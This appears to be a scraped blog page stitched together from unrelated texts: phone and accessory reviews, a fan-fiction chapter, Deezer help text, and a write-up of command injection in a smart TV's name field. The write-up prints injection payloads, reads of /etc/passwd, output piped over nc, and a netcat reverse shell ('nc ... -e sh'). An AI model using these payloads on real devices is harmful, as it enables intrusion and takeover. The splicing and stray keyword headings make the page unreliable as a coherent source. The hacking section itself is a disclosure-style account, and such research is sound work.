The iPhone 4 displays websites in high definition and this is because of the "retina display" the phone has. I have no idea what a retina display is, I simply know that the images on screen are always sharp and crisp.
The iPhone 4 is also very quick when using the internet and this is because it has 3G and WiFi connection capabilities.
The one problem that I do have with the iPhone is that it doesn't support the use of Flash files. This means that the iPhone doesn't display any flash movie and seeing that YouTube is full of flash movies then it becomes a problem. One way around this is the YouTube app for the iPhone. YouTube have started to convert their movies so that they will work on the iPhone, but because of the amount of files on their website this is going to take time. The YouTube app works fine but I find that often the videos that I search for don't appear in the way they would if you search online. An example of this is if you searched for "The Beatles" then you would get a ton of song covers before any of the songs performed by The Beatles.
Battery Life
As I mentioned above, previous to owning this phone I owned a Blackberry 8900 and although that phone was rubbish the battery life was pretty good. I could easily go a day and half without charging it, with the iPhone this isn't the case.
If you listen to music, write on Facebook/Twitter, check your emails and play on your apps then you are going to drain your battery down. The iOS 5 update also uses up more battery power again, but don't be alarmed, I use my phone all day and have never run out yet, although I have come pretty close.
The iPhone 4 will generally need to be charged at least once a day if you're a heavy user like me.
iPhone 4 conclusion
The iPhone 4 is a great touch screen mobile phone that has great internet and media capabilities. The best thing about any iPhone is the wide range of applications that are available to download for it. Being a student I get to commute a lot and because of this I often use my iPhone and my Kindle to keep myself amused. The wide range of apps available allows me to pass the time without thinking of the traveling I'm doing.
Final Word
The iPhone 4 does it all and I really don't see the need to update to the 4S, save your money and enjoy this great smart phone. After all no one will know whether you have the 4 or 4S as they are both identical to look at.

part 1
word count; 2217
no warnings
-------------------------------------------------------------------------------------------------
You had been working in the music industry for 5 years now with little success. You recorded some back-up vocals here en there but apart from that there wasn’t much. This was certainly not the big pop star life you had been dreaming off. You posted frequently on social media, uploaded music covers and attended events. The biggest thing that had happened to you was that one of the producers of Ariana Grande mistook you for a back-up dancer. Way to go. You decide to see what the world has to offer and pack up your bags to go to Seoul. This might start of your career. Everything changes when you get an email from a company called Big Hit Entertainment and they ask you to visit.
  02:43
The last few days have been rough. I got the email on Wednesday and was told that they wanted to see me on Monday. But that wasn’t all, I had to prepare three selfwritten songs to perform for them and they had to be written while I was here in Korea. So here I am, Sunday night still finishing the second song. I haven’t even started the third. I look out the window of my appartment and see the city fast asleep. Two songs to go, only a few hours left before I have to perform them. I can’t screw this up, this might as well be the biggest chance I’ll ever get. After a few minutes I can feel myself dozing off. No! These songs aren’t going to write themselves.
 04:01
Song number two is done after a huge writers block. The melodies just didn’t seem to work together and my lyrics sounded horrific. I tried to make it better but this was all I got. Now for te third song. I was tired and my brain was drained. How am I ever going to write a song in an hour that is going to sound good enough for a music company. I slam my head on my desk and pull my hair. I can feel my eyes tearing up.
“Pull it together, girl. You can do this.”
I look at my phone; 04:36. I have to be there at 11. If I finish this last song in two hours I can still get some sleep and look presentable enough. My loud sigh fills the room. Two hours for a three minute song with lyrics and instruments is far too short. But who says that it as to be three minutes long? I can write a short song, about two minutes maybe a bit more. I don’t need layers of melodies and multiple instruments. Just the piano and my voice. I stand up and walk to my old and crusty piano. Just one song left.
 05:16
Another piece of paper makes its way to the bin. I look at my notebook and see two full sentences, a few words and one melody. Might was well give them a call and give up because this is never going to work. I stand up and walk over to my window, a habit that I have gained during songwriting. The city calms me wit hall its beautiful glory. I think about the last few days. The first song took me the longest, about 3 days. It was a good song if it were to be edited by a professional or if I had the resources. But under these circumstances I was impressed by myself. I started the second song on Friday. This one caused me a lot of trouble. Things just didn’t seem to add up and in the end I threw it all out to start over. That’s why I’m now sitting here at 5 in the morning finishing these last songs. I see the bakery down the street light up. Wait, how long haven’t I eaten? The last two days were filled with music and I haven’t taken care of myself. I walk up tot he front door, put on a coat en get my bag. Time to get out of this appartment.
 05:48
The city feels cold. That might be because it’s early or because I’m wearing a legging with a coat in the middle of december. It’s probably that. I walk past the bakery and see a tiny woman kneading dough. She looks exhausted. I see my reflection in the window and think the same of myself. I put on my hood and stick my hands into my pockets. It’s a three minute walk to the banks of the river. I start humming the third song to myself and keep getting stuck at the chorus. I try again but the same thing repeats its self. I arrive at the river banks and take a seat on the concrete. I wrap my legs underneath me and take a deep breath in. Let’s think of something other than music for a second. I see a young man walking on the other side of the banks. He’s wearing a pair of jeans with just a jacket and has a cigarette inbetween his lips. He walks rapidly and turns into an alley. Seeing the cigarette made my eyes widen. I dropped the habbit ever since I left the States but seeing him makes me realise how much I miss it. I stand up and walk tot he nearest kiosk. I buy one pack of cigarettes and a lighter. As I make my way back to the river I look at the pack. The concrete is cold and harsh underneath my legs. I open the pack and take a cigarette out. I put it between my lips and light it. As the smoke hits my lungs I start to cough. After that my lungs embrace the smoke and my body welcomes it. I stay seated on the concrete and I finish my cigarette. I take out my phone.
“Fuck.”
06:30. I have to wake up in two and a half hours but I still haven’t finished this goddamn song. I jump up and speed back to my home. The city fills itself with its inhabitants. Seoul during rush hour is a nightmare that you’ll always want to avoid. But now that I had forgotten about the time it is unavoidable. You walk past the bakery once again and see that it is packed. The exhausted women looks better this time and is smilin while she is helping here customers. I, on the other hand, look even worse than before. I quicken my pace and arrive home. I trow off my coat and sit behind the piano. Just like that the song rolls out of my fingertips.
 10:30
I have my third cup of coffee in my hands as I wait for my cab. I woke up at 09:30, after only two hours of sleep. I hope the concealer under my eyes will hide the tiredness and that the coffee will pull me through. Suprisingly I am feeling very confident about my music. The last song is my absolute favourite. The soft vocals with the powerfull piano sells it completely. I look to my left and see that my cab has arrived. It’s all or nothing from now on.
 10:50
I thank the cab driver and open the car door. Here we are, Big Hit Entertainment. Big breath in, big breath out. Let’s do this. I enter the lobby and walk up to the women behind a big white desk.
“Goodmorning, my name is y/n and I have an appointment.”
She nods at me.
“Do you know with whom you have this appointment, dear?”
Before I can answer a man walks up to us.
“That must be me! It’s a pleasure to meet you, y/n. My name is Adam and I am a CEO here at Big Hit. ”
“Pleasure to meet you too, sir” He is a tall man with a very warm smile. Judging from his appearance, name and accent he wasn’t born here.
“Follow me. I have a room for you on the fourth floor.” Adam turns around and heads tot he elevator.
I mouth a thank you to the woman behind the desk and follow him. He doesn’t speak to me until we are at the fourth floor.
“I’m sorry if I appeared rude by not speaking to you, but I have a terrible fear of elevators. I’m a bit claustrophobic I might say.”
I smile to him. “None taken. I know what you’re talking about.”
“And this is where we’ll be seated. Can I get you anything? Coffee, tea, water?”
“A glass of water would be fine, Adam.”
“Coming up!”
He speeds out the room. It almost seems like he is more nervous than me. I sit down and cross my legs. It is a beautiful office with wooden floors and white walls all around. I take out my lyrics and sheet music and lay them down on the desk. I hope they have a piano here somewhere. I take out the USB with the recordings on them and put that right in front of me. Adam enters the room and leaves the door open. He is more like very claustrophobic. He puts the water in front of me and takes a seat behind the desk.
“I need to tell you, y/n, that this is the first time I’m doing one of these interviews. Can I tell you a secret? I am very nervous about it.” He starts to chuckle like a ten year old boy who just confessed his love to his girlfriend. “As I told you my name is Adam and I am a CEO here. I originally come from the UK but decided to move here after I met my wife, who is from Seoul.” Adam continues talking nonesense about his personal life and doesn’t seem to care if I am listening or not. I get distracted by shouts in the corridor so I turn my head. Adam doesn’t seem to notice. I occasionally nod and hum to make it seem like I have some sort of interest in his story. I look out the door and see a man shooting down the corridor in a shopping cart. I frown as I see more shopping carts following the first one, all containing men. I give a confused look to Adam and he excuses himself. I hear some more shouting now with Adam’s voice in the mix. He comes back and apologises.
“I’m sorry , this tends to happen sometimes. But now on to you. I watched some of your covers online and really enjoyed them. I looked up your blog and saw that you were coming to Seoul so I immediately sent you an email. We are looking for hardworking singers and songwriters to help produce or even produce their own music. That is why I think I work so well with this company. ”
Adam really loves to talk about himself. I do the polite nod and hum once again and look out the door. I see a face coming through the frame mockingly mimicking Adam. I have to hold my laughter in.
11:30
“Adam, I really love your stories but I would also love to do what I came here to do.” I cut him off and smile.
“Oh ofcourse! Could you show me the songs?” I hand him the lyrics and sheet music of all three songs. He pretends to read them but then confesses.
“Y/n, I have now idea what this sheet music means or in what way these lyrics fit in. I would like to hear it.” I chuckle. I don’t know if this man is really dumb or that he stopped caring a long time ago.
“It’s fine. I just need a piano and an USB port.”
Adam nods and tells me to follow him. I pack my stuff and walk in the corridor. In the back is see the man standing that made those faces when Adam was talking. He winks at me and I point at Adam and roll my eyes. He laughs out loud. Adam looks at him.
“Can I help you with anything Seokjin?” The man smirks at Adam and shakes his head.
Adam turns around and the man who I now know is named Seokjin rolls his eyes at him. This time it’s me who can’t contain my laughter. Adam looks at me and i raise my eyebrows. He turns around and acts like nothing happened. We arrive at a huge room. This time with withe floors and white walls. On the biggest wall hangs a sign that says; Big Hit Entertainment. In the middle of the room is a beautiful shiny black piano.
“Or sound system is on the side and the microphones are there as well.” Adam takes a seat on a chair.
I grab a mic and plug the USB in. I secure the mic on the piano and take a seat.
“Could you press play Adam?” Adam sighs.
“I’ll do it.” A tall man with purple hair walks in the room. “Adam needs his rest these days.” He chuckles. “Just press play?” He looks at me now.
“Yeah, that will do.” I crack my knuckles and warm my voice. I look at the purple haired man and nod. He presses play.

Soundpeats qy7 cant get it to play
Tumblr media Tumblr media
To pause your music press once on either earbud, to skip track double press right earbud, for previous track double tap left earbud. Hacking A Smart Tv Mac
Tumblr media
The companies making internet-connected smart televisions have drawn criticism for collecting and sharing user data. If you want effective protection from unscrupulous companies, shifty hackers. Feb 14, 2018 Constantly update your smart TV firmware and the apps running on it (most smart TVs have an auto-update option). Prefer wired connections over wireless because they’re more difficult to compromise.
Hacking A Smart Tv Mac 10 15
Smart Tv And Hackers
It was one of those lazy evenings, just watching TV after a long day. I was tired but kept on thinking about a vulnerability I found earlier on in a router someone gave me. Finding a flaw in such a device is always quite fun because you often see things that aren’t meant to be seen by the users, except the developers and maybe the company’s tech support team.
Since I was very tired, I just wanted to set the sleep timer on the television and lie down. But while setting the timer I wondered about other possible menu functions, and if there any hidden features that are only meant for the support team or the developers. After a quick Google search on my mobile phone I found out that this brand of televisions has a code that opens a hidden menu.
This piece was originally published on Netsparker, developer of a website vulnerability scanner used by companies including Samsung, Verisign and NASA.
After opening the settings and typing in the code on my remote control, another menu popped up on the left side of the screen. Almost all of the categories it showed weren’t accessible. I could only activate “Hotel Mode” and view the version number of the set.
I wanted to find out more about the TV. Within the settings, there was a category called “info”. I opened it and only saw some more version numbers. Then something else caught my attention; I could actually give my TV set a name.
The vulnerability in my Smart Television set
When you work in Information Security, you can’t help but to test some payloads you use on a daily basis on other input fields you encounter. It might be a GET parameter on your router’s web interface, the control panel of your new printer, or, in my case, a TV. So I thought it would be fun to rename my TV to “television `sleep 5`”.
The companies making internet-connected smart televisions have drawn criticism for collecting and sharing user data. If you want effective protection from unscrupulous companies, shifty hackers.
Upon opening the case of his 40″ Hisense Smart LED TV, he discovered that the logic board actually had two unused USB pads — what luck! He tapped off of them to get 5V @ 500mA to power the Pi.
After entering and submitting the payload from my remote ,the settings menu just froze for a long time. Once it was responsive again I changed the name so I could select other menu entries. I didn’t really think that I had just found a command injection or something similar. It’s not odd for my TV to hang for a few seconds before changes are made, but because now it took a longer time to become responsive, it made me curious.
The time did not match my input as it was way longer than five seconds. I thought it might have something to do with the backtick characters I injected. Maybe the TV did not expect them and threw an error which prevented it from loading. I typed in “television `sleep 0`” and tried it again. It loaded instantly.
There is something definitely happening, but was not sure what and how. So I decided to measure the time. It turned out that it always took the television set three times longer than the input number to become responsive, as shown below:
sleep(2) - 6 seconds
sleep(3) - 9 seconds
sleep(5) - 15 seconds
Tumblr media
Running Commands on my Smart TV
I couldn’t believe it. There was actually a command injection in the first input field I tried. Freezing the menu was not an ultimate proof though, and it was not very useful in terms of exploitation. Since I only had 31 characters, minus the two backticks, my payload could only consist of 29 characters.
Below is a list of commands I tried to run on the TV, including an explanation of what they are and also a confirmation if they succeeded or not.
Command
Explanation
chars/
succeeded
`which nc && sleep 2`
which is a linux command that returns the path to a program if it exists.
&& sleep 2 would freeze the menu for 3*2 seconds if the which function found nc on the TV set.
19
Yes
`which ssh && sleep 2`
I wanted to see if ssh was installed.
20
No
`which wget && sleep 2`
But it had wget
21
Yes
`cat /etc/passwd && sleep 2`
I wanted to see if /etc/passwd was readable. It was, and it would have been a big surprise if it wasn't
26
Yes
`cat /etc/shadow && sleep 2`
This one is interesting. When you have root privileges the /etc/shadow file is readable. I wanted to test if I am root but the file wasn’t readable.
26
No
`ls /etc/shadow && sleep 2`
This is the explanation why the shadow file couldn’t be opened. It just didn’t exist.
25
No
It was really late so I decided to go to sleep and try to get a shell the next day. After waking up the hardest part followed: getting out of bed to get the laptop and an ethernet cable. Until now I didn’t even have to go anywhere and I found it quite funny that I was able to run system commands on my TV just by using a remote control.
Getting shell access on the Smart TV
My TV is wall mounted, so plugging in a cable is not as easy as one would imagine. After a dislocated shoulder and several threats towards the TV I plugged the cable in. I connected it to the laptop and found out the laptop’s IP with ipconfig.
So now that I knew the IP address of my laptop, I only had to get a reverse shell to my laptop. Therefore I did not need to know the IP address of the TV. Also a reverse shell is handy because it would bypass any possible firewall rules blocking incoming connections. But before thinking about how to get one in less than 29 characters I wanted to learn a little bit more about the system.
Using Netcat on the Smart TV
I found out that there is nc installed on the TV set, so I decided to pipe the output of certain commands through nc back to my laptop. The first one I tried was of course id, which would tell me whether or not I had root privileges on the Smart TV set.
As seen from the above I had root privileges. This wasn’t too surprising, but it was still nice to see. The next thing I did was getting a directory listing of / with `ls -la /|nc 169.254.56.216 5`
Perfect. But I still had no shell to issue proper commands. All of them were more or less length restricted and not too useful. However, since the version of nc that was installed on the TV allowed the -e flag it was easy to get a reverse shell with: `nc 169.254.213.210 5 -e sh`
I had shell access on the Smart TV
Perfect. I now had a proper shell to work with. I was especially interested in messing with the TV in a visible way. There were multiple possibilities, such as changing the logo that’s being shown during the boot up process, or changing the apps icons. Since this is a smart TV, it has some preinstalled apps such as Youtube and Skype.
I noticed that most of the file system was read only, so I could not just change the logos. But there were pictures that were frequently changing, i.e. the channel preview boxes you can see while zapping between different TV channels. They contained snapshots of the programs that ran when you visited the channel. Obviously those had to be saved in a place where you could read and write files.
I noticed that the icon images were .png files. I listed all files with a .png extension by using the command find / -name *.png but the preview files were not there. However I tried the same search but this time for .jpg files, and I noticed some files like channelImage123.jpg. After uploading the files that I wanted to show, and replacing the corresponding channelImage files, this was the result.
Hacking A Smart Tv Mac 10 15
Your TV is not as smart as you would think
Internet connected devices can have vulnerabilities in the weirdest of places, where you would expect them less. When I tested the sleep command I didn’t even think it would work at all, I did it just out of boredom. I also had no idea that my TV runs on linux and was even more than surprised to see that my vulnerabilities are exploitable.
This vulnerability is not exploitable remotely, however it convinced me that I was right to not connect my TV to the internet, and use its (not so) smart features. I am not really comfortable with the thought that someone can have control over my TV.
Tumblr media
I think there are way cooler things and more vulnerabilities that I could exploit on the TV set. But it is not worth the heart pains I get when the device freezes, and I have to wait for a minute to see whether it was bricked or not. Because after all you watch television to relax and not to raise your blood pressure, except if you like to watch football.

On the Asian side of the globe it is available in Pakistan, Philippines, Indonesia, Malaysia, Singapore and Thailand. Deezer is now available across a staggering 160 countries worldwide and serves across multiple platforms.
Part 2. How does Deezer Function?
Deezer is perhaps the simplest online music streaming service you’ll ever have. Whenever you sign up it asks you to list down your favorite genres and your favorite artists. As soon as you do that it hooks you up with new ‘Flow’ feature they introduced back in 2012, what Flow does is incredible to say the least! It fuses all of your music in one place, once you allow Deezer to access your old albums and it constructs a playlist that includes songs with respect to your previous music albums and allows you to further expand your Music Library. It provides you with four subscription plans namely Discovery, Premium+ and Family.
Discovery comes free and is made for most of the users online, this version is ad-supported and the quality isn’t the best available. There is no offline mode and neither does it support TV, Hifi, or Google Chromecast. Premium+ is available for 9.99$ per month and includes support for Car, TV, Hifi and Google Chromecast. Family Subscription pack is available it 14.99$ per month and gives you at least 6 accounts to use plus it contains all of the features mentioned earlier. The MP3 Quality available on Family and Premium+ is 320kbit/s.
Part 3. Problems you might face while using Deezer
Although the engineers working behind the scenes have put in all the work to in order to ensure that customers do not face any sort of problem, some malfunctions might still occur and for them the Deezer Technical Support system has tried to help its users. For Example, if the Deezer Website stops responding or the music does not play properly try updating your browser and check your flash player.
In other ways you can clear your cache or even try using a different browser. If the problems are still, there change the computer you’re currently using and access Deezer from another source. This issue is common with iOS users where all of their songs disappeared; it mainly happened because of the major update that the operating systems went through.
Some users chose to perform a clean install. In order to download your tracks again, navigate the desired album/playlist or track and toggle the Download button so the color turns green, indicating it's enabled. Sometimes users from different countries might not have access to other songs this is mainly because of them being free users and the artists might not have the license of that particular region.
A Premium+ subscriber should be able to access their Deezer account from any country they choose. There will be slight variations on the catalogue available to you when you are abroad as the licensing agreements vary from territory to territory. There have been complaints that some songs only play for about 30 seconds, if you are using Fidelio AW2000 and having premium version of Deezer then sometimes the user is facing problem of playing songs for less time. There can be a possible reason of this problem is your speaker. To solve the problem of speaker you can reset your speaker by going in setting via airstudio app and then you can try again. You might be facing this problem because your Deezer account may have expired. If you’re facing difficulty in the Deezer app via your phone try reinstalling the app and the problems will disappear hopefully.

How To Clean Samsung Tablet Memory

There are two types of reset that you can perform an any Samsung Galaxy Tablet — soft reset and hard reset. Soft reset is a fancy term for what common folks refer to as restart. Restarting an electronics is usually used to fix minor bugs or performance issues. Restarting or soft resetting a device clears an electronic device’s memory or Random Access Memory. When we say memory, we don’t mean the storage device but the RAM. Restarting a device wipes the RAM but your personal data stored in your phone’s internal storage device remain as they are. Soft reset is usually effective in solving problems involving slow apps or operating system. Hard reset, on the other hand, refers to factory reset or master reset. This basically means wiping the phone’s internal storage and reverting all software settings to their defaults. All settings, app data, and user customizations will be deleted by hard reset. If you don’t want to lose your files such as photos, videos, music, documents, etc., be sure to back them up ahead of time.

There are a number of ways you can attach your phone to your car. Whether magnetic mount or windshield suction, options for quick phone access while driving are plentiful. But many of these options don't include smart assistant support.
The iOttie Aivo Connect solves the problem of smart assistant support by adding a built-in Alexa interface into the car mount. But is it any good, and why would someone choose something like the Aivo Connect over Apple CarPlay or Android Auto? Let's find out.
youtube
An Introduction to Aivo Connect
iOttie's Aivo Connect is a $99 motorized phone mount for your car that includes Alexa Auto. This means that instead of playing with your phone, you can keep your hands on the wheel and ask Alexa to do things like make calls or get directions.
Tumblr media
In addition to those conveniences, Aivo connect lets you keep your phone in sight, so you don't miss anything important. And the integrated Qi wireless charger provides wireless power, so you don't have to worry about plugging your phone in during long road trips.
The Aivo Connect also uses an automatic motorized cradle to keep you from wrestling with manual mounts. A sensor in the Aivo clamp detects when an object is held near, and opens the cradle's jaws so you can slide your phone snugly inside.
Who is The Aivo Connect For?
Tumblr media
When you first see the Aivo Connect, you might ask yourself, "why the heck do I need that? I already have Android Auto or Apple CarPlay." Well, if you currently own a vehicle with one of those two smart assistants, then the Aivo Connect probably isn't for you. Probably. But, if you're a huge Alexa fan, Aivo Connect might still be something to consider.
Newer assistants like Apple CarPlay and Android Auto both have significant features and make good use of your in-dash display for traffic, music, and phone calls. Unfortunately, Aivo Connect won't replace the functionality of those two services.
But, if you drive a vehicle that is a few years old, then it's likely that a smart assistant isn't something currently available in your car. If you have a late-model vehicle that you're not ready to give up, Aivo Connect is a great way to update your vehicle with smart assistant capabilities to keep you driving safely.
Finally, if you're more interested in the motorized clamping mechanism, wireless charging, and sleek look of the Aivo Connect than the Alexa functions, you'll also appreciate this device. Even without Alexa support, iOttie scores a win here.

What's in the Box?
Tumblr media
Inside the Aivo Connect box, you'll get:
The Aivo Connect Wireless Charging Car Mount
The 12-volt to USB-C power cable
(2) stick-on twist-lock plastic base plates
The Aivo Connect instruction manual and Quick Start guide
As for installation, the Aivo Connect mounts to either the windshield of your vehicle or your dashboard. I chose the dash as I don't like objects obstructing my view while I am driving. The beauty of having two stick-on bases is that you can try different attachment points to suit your preference. On the other hand, the second plastic base can also be used for another vehicle, as the Aivo Connect locks and unlocks from the base with only a slight twist.
To attach the base plate, clean the mounting surface with something like rubbing alcohol (always test for colorfastness) and wait for the surface to dry. Then peel the red adhesive backing from the mounting plate. Align the arrow on the mounting plate in the driver's direction, and then press and stick.
From there, you'll slide the Aivo Connect onto the base and press down until the unit is flush with your surface. Then twist the mount one-quarter turn clockwise to lock it in place. Finally, plug the 12-volt power cable into the 12-volt auxiliary power port in your vehicle.

Testing the Aivo Connect
Tumblr media
To test the Alexa functionality of the Aivo Connect, I took the unit for a drive. Before getting out of my garage, I asked Alexa to cue up some 90's Hip-Hop, and I tried to get directions to the nearest Home Depot. As long as my internet connection wasn't spotty, then Alexa Auto functioned beautifully. But, about three hundred feet from my home, when the signal from my wireless router switched over to 5G, Alexa buzzed and told me that she was having trouble connecting. This wasn't unexpected.
As for the device's mechanical cradle, I did have occasional issues with the Aivo not recognizing that I was waving my phone at it. I found that if the phone wasn't square to the sensor at the base of the charging pad, the unit wouldn't reliably recognize something in front of it. However, if I made sure the phone was square to the sensor, then the Aivo Connect opened every time. Additionally, the unit detected my phone at a maximum distance of 4 inches away from the charging pad.
Tumblr media
Wireless charging also functioned well. I usually keep my phone in a Moment photo case, and with this case on, I had no trouble getting the Aivo to charge. That said, I don't usually use any kind of Pop-Socket, or grip on the back of my phone. If you do, you're probably already aware that wireless charging may not work with these accessories.
Phone grips like the Pop-Socket also present another problem with the Aivo Connect. This unit's jaws are relatively shallow and seem designed to work only with a phone and case combination. Putting a grip on your phone and then trying to insert it into the Aivo doesn't give the mount enough bite to hold your phone securely.
That means if you are one of those people who cannot be without your phone grip, then you'll want to skip this offering and try and find something that will accommodate the extra accessories.
On the rear of the unit are two buttons that allow you to release your phone from the clamp. The idea is that when you need to leave your vehicle, you hit one of these buttons and wait for the clamp to open and drop your phone into your hand. You've got to be ready to catch your phone, though, because this clamp does not mess around. Instead, pressing the button lets your expensive cellphone drop faster than an amusement park water slide.
Tumblr media
One common issue that I've had in the past with other phone mounts has been that they would not stick to my dashboard. My 2018 Honda CR-V has a pebbled leather dash, which means many mounting solutions don't adhere well. This issue was a concern for me when installing the Aivo Connect.
Fortunately, this wasn't the case. After a quick wipe down, I stuck the mounting base to my dash and held it for the required 30 seconds. I've been testing this unit for the last week, and I haven't had any trouble with the adhesion, even after removing and reinstalling the Aivo Connect multiple times.
For my final test, I wanted to see how Alexa handled loud music. One of the things that I love about Siri is its ability to respond, even when I'm blasting music at dad volume. Unfortunately, responses were where I had the most trouble with the Aivo Connect.
Related: How to Use Android Auto Wireless
Tumblr media
The unit has three microphones built into the base, and unless you've pressed the mute button, the microphones are always listening for the wake word. However, even with all three microphones active, when the music in my car was slightly higher than normal listening volume, Alexa had trouble hearing me. It's hard to determine whether this is an Alexa issue or an issue with the iOttie Aivo Connect.
On the back left of the device, there is a button that allows you to summon Alexa. This button is great and circumvents Alexa's selective hearing. I found that it came in handy when Alexa was acting like my teenage daughter and ignoring me.
But, if you're trying to use a hands-free smart assistant and you have to take your hands off of the steering wheel to scramble for a button, then the device isn't helping you be hands-free. So, if you're someone who likes to listen to loud music while you drive, then this device may not be suitable for you.
What Do We Love About the Aivo Connect?
Setup, installation, connectivity, and the motorized cradle are all well-executed in this unit. The wireless charging is one of my favorite features because it means I don't have to go digging around in my center console for a lightning cable.
Tumblr media
Also, not having to wrestle with a clamp when I want to attach my phone to my car is a feature that I appreciate. Adding a motorized clamp is genius, and it solves one of the most annoying aspects of mounting your phone in your vehicle.
Alexa support is also excellent. However, it won't replace Apple CarPlay for me. I've relied on CarPlay since I purchased my vehicle in 2018, and even though it has its quirks, it works well 90% of the time. I can also use my dash display to interact with it. If I did not have access to CarPlay, I would certainly benefit from Alexa. Being a cautious driver is essential these days, precisely because so many people aren't.
I also liked the two included bases and the ability to swap this device between cars. This ability is something that I think people might overlook. If you've got more than one vehicle and neither has a smart assistant, then you need something like the Aivo Connect.
Finally, iOttie has put some serious attention to detail into this unit. On the right-side jaw of the Aivo Connect, for example, molded into the rubber is a slight indentation. At first glance, this might not seem like a big deal, but when you install your phone into the clamp, that indentation keeps the clamp from accidentally pressing the side button of your phone. It's a minor detail, but it addresses another common annoyance of clamp-style phone mounts.
What's Not to Love?
Tumblr media
Alexa's selective hearing is something that might rub some people the wrong way. Again, this may not be the fault of the iOttie Aivo Connect, but it is something to be aware of. While not the end of the world, having reliable smart assistant support is arguably more important than having no support at all.
Additionally, you must be careful not to accidentally press one of the rear buttons that release your phone. If you're not attentive, then your expensive device could wind up falling out of the clamp and smacking whatever is underneath it on the way down. If you're aware of it, then you'll be much less likely to succumb to a disastrous spill.
There's also a limitation for texting support. If you'd like to text people, they must also be users of Alexa Communication. That means they must have either the Alexa app installed on their phone or have some type of Echo device to receive messages. For some, this might not be an issue, but if your primary means of communication is via text message, you might get frustrated with Aivo Connect.
Finally, as I've mentioned earlier, if you're already using a smart assistant in your car, then the Aivo Connect is not going to replace your current "boo thang." But these tiny gripes aren't stakes through the heart of the Aivo Connect by any means. They're more like minor rough edges.

Can You Repair the Aivo Connect?
On the rear of the Aivo Connect are four Philips screws that you can remove from the unit. To save you some hassle, I removed those screws and gently pried apart the wireless charging pad. Before I could get everything apart, however, I was greeted with wires, capacitors, and electronic components tightly sandwiched inside the unit.
Tumblr media
I'm not afraid to take most things apart, but once I saw the delicate electronics inside, I snapped the charging pad back together and reinstalled the screws. I highly advise against taking this device apart. There are no user-serviceable components, and if you break something, you're likely going to be out a hundred bucks.
Should You Buy the Aivo Connect by iOttie?
iOttie has done an excellent job with the Aivo Connect. If you are looking to add a smart assistant to your vehicle, I would recommend picking it up. The motorized cradle system and the wireless charging make the device worth its $99 price tag even ignoring the Alexa support. But it really shines once you make full use of Alexa. It's also a much more capable device than Amazon's Echo Auto. Even with the limitations that we discussed.
Overall, the Aivo Connect is a cleverly-designed unit that demonstrates the many reasons why iOttie is so prevalent in the automotive accessory space. We hope to see more great products like this one in the future.

As we all work remotely now or are using online video apps like Webex, Zoom, or Teams, having a good headset for hours upon hours of talk and listen time is critical. If your headset is heavy, extended wearing time weighs down on you, literally. Or if you need to hear your surroundings, like while being at home or while driving, having earbuds can severely restrict your hearing. That’s why, when I got the opportunity to review the AfterShokz OpenComm bone conduction Bluetooth headset, I was intrigued by many of its innovative features. It’s truly not like any other headset you may have used in the past! (*Disclosure below.) I have tested many different types of headsets and earbuds in the past. Some are fantastic for commuting, where they fully block out all of the ambient noise. Others have had ANC (Active Noise Cancelling), which drowns out other types of background noise. Others are great for gaming, and while they are light-weight (and actually quite good for extended video conference calls), they are big and bulky and don’t really look “professional.” Then I tried the AfterShokz OpenComm Bluetooth headset, and I suddenly have a new favorite headset for all of my video conferencing needs. The AfterShokz OpenComm’s have a truly unique design and solve similarly unique use cases. Do note, these might not be perfect for you. You need to understand that using the OpenComm headset, your ears are NOT obstructed in any way. There is nothing that physically covers your ear or goes into your ear. Sound is transmitted by something called “bone conduction,” which I will go into later. So this headset might not be good for just jamming out to music (personally, I would prefer using earbuds or a headset). But for video conferencing or phone calls, I’m sold! What is Bone Conduction? The AfterShokz OpenComm uses a technology called Bone Conduction to transmit sounds. It is not a new technology. It’s been around for quite a while and is used by other types of headsets or earbuds. AfterShockz seems to have done a fairly good job incorporating it into their product line as other headsets use it as well. According to AfterShokz, they are using 7-generation bone conduction technology, which, in my mind, means it is fairly mature. And, I should state, there are plenty of people who love as well as dislike this technology. So how does it work? Essentially, these types of headsets have their “speakers” that rest on the wearer’s cheekbones. While traditional headsets transmit sound waves that cause the eardrum to vibrate, with bone conduction, those sound waves are instead transmitted through the cheekbone, effectively bypassing the eardrum and going directly to the cochlea. The cochlea is “the spiral cavity of the inner ear containing the organ of Corti, which produces nerve impulses in response to sound vibrations.“ Here is where you can decide whether you love or don’t love bone conduction. As I mentioned before, it truly depends on your use case. After testing out the AfterShokz OpenComm headset, I can strongly say that I would NOT use it for listening to music. You do lose fidelity, and the lows (like the bass) are almost non-existent. That being said, for spoken words, like listening to a podcast or participating in an audio or video conference call, I feel that the AfterShokz OpenComm are ideal, and not just because the bone conduction technique works great for that use case. It’s because of the other features and design of the OpenComm headset. When you first use the AfterShokz OpenComm and experience the bone conduction in action, it may be a bit surprising. It actually does work, and, even though this is essentially an “open ear” headset, those around you cannot really hear the audio coming from the headset (unless you crank up the volume all the way to 11). And a funny side note about high volume and bone conduction. To get high volume, the headset has to vibrate more intensely. When you put it at high volume, the “speakers” actually vibrate so much on the OpenComm, that they actually tickled my cheekbones where they rested. You will feel the vibrations (obviously) at lower levels, and sometimes it takes a little getting used to. A Well Thought Out Design Let’s talk a little bit about the design of the AfterShokz OpenComm Bluetooth headset. It’s my belief that AfterShokz wanted to create a headset that could be worn for extended periods of time. So that is how I actually tested it. First, there is the USB magnetic charger, which can plug into your USB Type-A port. This (proprietary) cord has two magnets that connect to the headset itself and hold it in place while it charges. Don’t lose this cord as you will have to order one specifically from AfterShokz – they are non-standard. I simply charged the headset over-night. But you can get a full charge quite quickly – about one hour. And how long does a battery charge last? According to AfterShokz, you can have up to 16 hours of talk time or 8 hours of listening time! That’s impressive. So at the beginning of my work-from-home day, I put the headset on. Since it is Bluetooth, it is cord-free. The headset does rest over your ears, but not in them. And the “speaker” (the bone conduction part) presses lightly on your cheekbones. A band connects the two “speakers” behind your head. I left the AfterShokz OpenComm headset on my head and connected to my MacBook Pro via Bluetooth all day. I conducted several video conference calls and left them on my head for the full 10-hour workday. I even wandered around my home to test the range of the Bluetooth. Before I go into the usage and performance results, let me tell you a bit more about the design. For starters, I need to highlight the weight of the AfterShokz OpenComm headset. It weighs only 33 grams! Let me translate that into what that really means. It is so light-weight, after time, you barely notice that you are wearing it. To me, this is an incredibly important spec. If a headset is too heavy, you will take it off. I literally left the OpenComm’s on my head the entire day and have been for several days for work hours. Some other quick, yet important specs: It uses Bluetooth 5.0It has a wireless range of about 33 feet (which I can attest to)It has a water-resistant rating (IPP55)Standby time is about 14 daysCharge time is about 1 hourThe mic is DSP Noise-Cancelling But all specifications aside, how well does the headset work for working at home or in noisy environments? Thoughts on using the 